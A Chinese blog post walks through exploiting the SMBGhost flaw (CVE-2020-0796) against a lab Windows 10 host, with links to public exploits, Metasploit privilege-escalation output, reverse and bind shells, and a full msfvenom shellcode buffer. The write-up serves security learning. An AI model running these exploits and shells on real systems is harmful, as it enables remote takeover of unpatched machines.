即17年永恒之蓝后,又爆出永恒之黑,445不愧是安全工程师的噩梦。
漏洞简介 #
Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block是其中的一个服务器信息传输协议。
Microsoft Server Message Block 3.1.1 (SMBv3)版本中存在输入验证错误漏洞,该漏洞源于SMBv3协议在处理恶意压缩数据包时,进入了错误流程。远程未经身份验证的攻击者可利用该漏洞在应用程序中执行任意代码。以下产品及版本受到影响:Microsoft Windows 10版本1903,Windows Server版本1903,Windows 10版本1909,Windows Server版本1909。
受影响版本 #
Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation)
实践 #
所需工具与镜像下载地址:
win10:ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/
CVE-2020-0796代码执行/POC:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
CVE-2020-0796代码执行/EXP:https://github.com/chompie1337/SMBGhost_RCE_PoC
CVE-2020-0796蓝屏攻击/EXP:https://github.com/eerykitty/CVE-2020-0796-PoC
CVE-2020-0796本地提权/EXP:https://github.com/danigargu/CVE-2020-0796
环境的搭建: #
| kali | 192.168.142.19 |
|---|---|
| Win10 | 192.168.142.61 |
windows版本信息(记得关闭防火墙):
所需软件:
蓝屏攻击: #
这里使用刚刚下载的EXP进行攻击:
对win10系统进行攻击:
//安装依赖库
python3 setup.py install
//运行程序
python3 CVE-2020-0796.py 192.168.142.61
本地提权: #
这里的本地提权可以使用msf自带模块进行操作,这里就通过msf进行测试,GitHub上的程序就不测试了:
msf6 exploit(multi/handler) > set lhost 192.168.142.19
lhost => 192.168.142.19
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.142.19:4444
[*] Sending stage (200262 bytes) to 192.168.142.61
[*] Meterpreter session 2 opened (192.168.142.19:4444 -> 192.168.142.61:51757) at 2020-11-08 15:28:20 +0800
meterpreter >
meterpreter > getuid
Server username: DESKTOP-RL1VAD8\wy
meterpreter > background
msf6 exploit(multi/handler) > search cve_2020
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/sap/cve_2020_6287_ws_add_user 2020-07-14 normal Yes SAP Unauthenticated WebService User Creation
1 exploit/linux/misc/cve_2020_13160_anydesk 2020-06-16 normal Yes AnyDesk GUI Format String Write
2 exploit/windows/local/cve_2020_0668_service_tracing 2020-02-11 excellent No Service Tracing Privilege Elevation Vulnerability
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move 2020-03-10 excellent Yes Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability
4 exploit/windows/local/cve_2020_0796_smbghost 2020-03-13 good Yes SMBv3 Compression Buffer Overflow
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/local/cve_2020_0796_smbghost
msf6 exploit(multi/handler) > use 4
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_0796_smbghost) > show options
Module options (exploit/windows/local/cve_2020_0796_smbghost):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.142.19 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 10 v1903-1909 x64
msf6 exploit(windows/local/cve_2020_0796_smbghost) > set session 2
session => 2
msf6 exploit(windows/local/cve_2020_0796_smbghost) > check
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/cve_2020_0796_smbghost) > exploit
[*] Started reverse TCP handler on 192.168.142.19:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad to host the exploit...
[+] Process 908 launched.
[*] Reflectively injecting the exploit DLL into 908...
[*] Injecting exploit into 908...
[*] Exploit injected. Injecting payload into 908...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 192.168.142.61
[*] Meterpreter session 3 opened (192.168.142.19:4444 -> 192.168.142.61:52288) at 2020-11-08 15:29:49 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
msf6 exploit(windows/local/cve_2020_0796_smbghost) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/windows DESKTOP-RL1VAD8\wy @ DESKTOP-RL1VAD8 192.168.142.19:4444 -> 192.168.142.61:51757 (192.168.142.61)
3 meterpreter x64/windows NT AUTHORITY\SYSTEM @ DESKTOP-RL1VAD8 192.168.142.19:4444 -> 192.168.142.61:52288 (192.168.142.61)代码执行: #
首先使用奇安信POC进行漏洞测试:
下载并解压对应exp:
root@kali:~/SMBGhost_RCE_PoC-master# ll
总用量 56
-rwxrw-rw- 1 root root 19598 11月 8 10:42 exploit.py
-rwxrw-rw- 1 root root 8221 7月 3 02:49 kernel_shellcode.asm
-rwxrw-rw- 1 root root 4621 7月 3 02:49 lznt1.py
drwxr-xr-x 2 root root 4096 11月 8 10:45 __pycache__
-rwxrw-rw- 1 root root 1531 7月 3 02:49 README.md
-rwxrw-rw- 1 root root 5604 7月 3 02:49 smb_win.py
root@kali:~/SMBGhost_RCE_PoC-master# 使用EXP进行攻击,首先使用msfvenom生成payload:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python之后我们会得到类似于以下的数据:
buf = b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xc2\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\x15\xa5\x3f\x35\x7f\x5f\x38"
buf += b"\x9b\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\xe9\xed\xbe\xd1\x8f\xa0\xc7\x64\xfd\x69\x3f\x35\x7f"
buf += b"\x1e\x69\xda\x45\xf7\x6e\x63\x37\x6e\xea\xfe\x5d\x2e"
buf += b"\x6d\x55\x37\xd4\x6a\x83\x5d\x2e\x6d\x15\x32\x6e\xf1"
buf += b"\xd3\x1a\x12\x75\x7f\x37\xd4\x4a\xcb\x5d\x94\xff\x99"
buf += b"\x43\x3e\x44\x99\x39\x85\x7e\xf4\xb6\x52\x79\x9a\xd4"
buf += b"\x47\xd2\x67\x3e\x0e\x70\x10\x47\x85\xb4\x77\x43\x17"
buf += b"\x39\x4b\x73\x24\x47\x2d\x74\x5d\x37\x1e\x67\xa5\x3f"
buf += b"\x35\xf4\xdf\xb0\x9b\x15\xa5\x77\xb0\xbf\x2b\x5f\xd3"
buf += b"\x14\x75\x6f\xbe\x37\x47\x7c\x10\x55\x85\x76\x34\xaf"
buf += b"\xbc\x6e\xd3\xea\x6c\x7e\xbe\x4b\xd7\x70\x9a\xc3\xe8"
buf += b"\x0e\xfc\x37\x6e\xf8\x37\x54\x64\xf6\x38\x3e\x5e\xf9"
buf += b"\xa3\xf5\xd0\xce\x79\x7c\x13\x1c\x93\x50\x9c\xee\x40"
buf += b"\xa7\x07\x7c\x10\x55\x81\x76\x34\xaf\x39\x79\x10\x19"
buf += b"\xed\x7b\xbe\x3f\x43\x71\x9a\xc5\xe4\xb4\x31\xf7\x17"
buf += b"\x39\x4b\x54\xfd\x7e\x6d\x21\x06\x62\xda\x4d\xe4\x66"
buf += b"\x74\x25\x17\xbb\x77\x35\xe4\x6d\xca\x9f\x07\x79\xc2"
buf += b"\x4f\xed\xb4\x27\x96\x14\xc7\x64\xea\xf8\x76\x8b\x08"
buf += b"\x2c\x0a\xc4\x26\x97\x3f\x35\x3e\x09\x71\x12\xf3\xed"
buf += b"\xbe\xd9\xdf\x5e\x38\x9b\x5c\x2c\xda\x7d\x4e\x9f\x68"
buf += b"\xcb\x5c\x62\xfb\x37\x7f\x4e\x64\xda\x41\xec\xb6\xd1"
buf += b"\x33\xd6\xc9\xda\xaf\xe9\x48\x13\x78\xa0\xed\xd7\x9c"
buf += b"\x4f\x57\x34\x7e\x5f\x38\xc2\x54\x1f\x16\xb5\x14\x5f"
buf += b"\xc7\x4e\x7f\xa7\x66\x65\x2f\x12\x09\x52\x58\x94\xff"
buf += b"\x7d\x80\x9f\x70\x12\xd7\xe4\x85\xdf\x70\x80\xd8\x64"
buf += b"\xc0\xed\xb6\xf2\x15\x4f\x79\xc3\x59\x2c\xdd\x7d\xf6"
buf += b"\xa6\x79\x21\xd7\x7e\x08\x52\x80\x8a\x70\xaa\xc7\xed"
buf += b"\xb6\xcc\x3e\xe5\x8f\x72\x2d\x5a\xc0\xe0\x32\x6e\xf8"
buf += b"\xd3\x24\x77\x77\xbc\x86\x1e\x82\xef\xf9\x9e\xde\xca"
buf += b"\xaa\x17\xb1\x62\x5d\x2c\xf8\x74\xc5\x2a\x56\xd6\x74"
buf += b"\x5a\xea\x7d\xfe\x9b\x88\x99\x15\xa5\x77\xb6\x93\x4f"
buf += b"\x70\x12\xf7\xe8\x0e\xfc\x15\x5b\x79\xc3\x5d\x2c\xc6"
buf += b"\x74\xc5\x5d\xe1\x53\x4a\x5a\xea\x7d\xfc\x9b\x18\xc5"
buf += b"\x9c\x53\x55\x75\x3e\x06\x50\x9b\x05\xa5\x3f\x74\x27"
buf += b"\x17\xb1\x69\x5d\x94\xf6\x74\xc5\x07\x9c\xc8\xf0\x5a"
buf += b"\xea\x7d\xf6\x9c\x71\x12\xd2\xe8\x0e\xfc\x36\xd6\xc8"
buf += b"\xd3\x9c\x7f\x77\xbc\x86\x1e\x82\x99\xcc\x6d\x60\xca"
buf += b"\xaa\x17\x39\x58\x5d\x8c\xf9\x7d\xfa\xa9\x4d\x7a\x54"
buf += b"\x5a\xd8\x6d\x15\x5f\x61\xd2\xd2\x67\xcf\x80\xdd\x09"
buf += b"\xc7\x4e"在exploit.py文件中的USER_PAYLOAD更改为以上内容:
首先删除原USER_PAYLOAD数据:
将刚刚生成的payload数据粘贴进去
使用:90,135s/buf/USER_PAYLOAD/g将90行至135行中所有buf更改为USER_PAYLOAD:
使用exploit/multi/handler模块开启监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 192.168.142.61
rhost => 192.168.142.61
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.142.61 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 192.168.142.61:4444然后使用exp对服务器进行攻击:
root@kali:~/SMBGhost_RCE_PoC-master# python3 exploit.py -ip 192.168.142.61
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7f540000000
[+] found PML4 self-ref entry 10d
[+] found HalpInterruptController at fffff7f540001478
[+] found HalpApicRequestInterrupt at fffff80216ab3bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at ffff86fbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000950!
[+] Press a key to execute shellcode!到达以上这一步需要回车,然后就会弹出shell了:
特此声明: #
此文章仅供学术交流,请勿用于任何非法用途。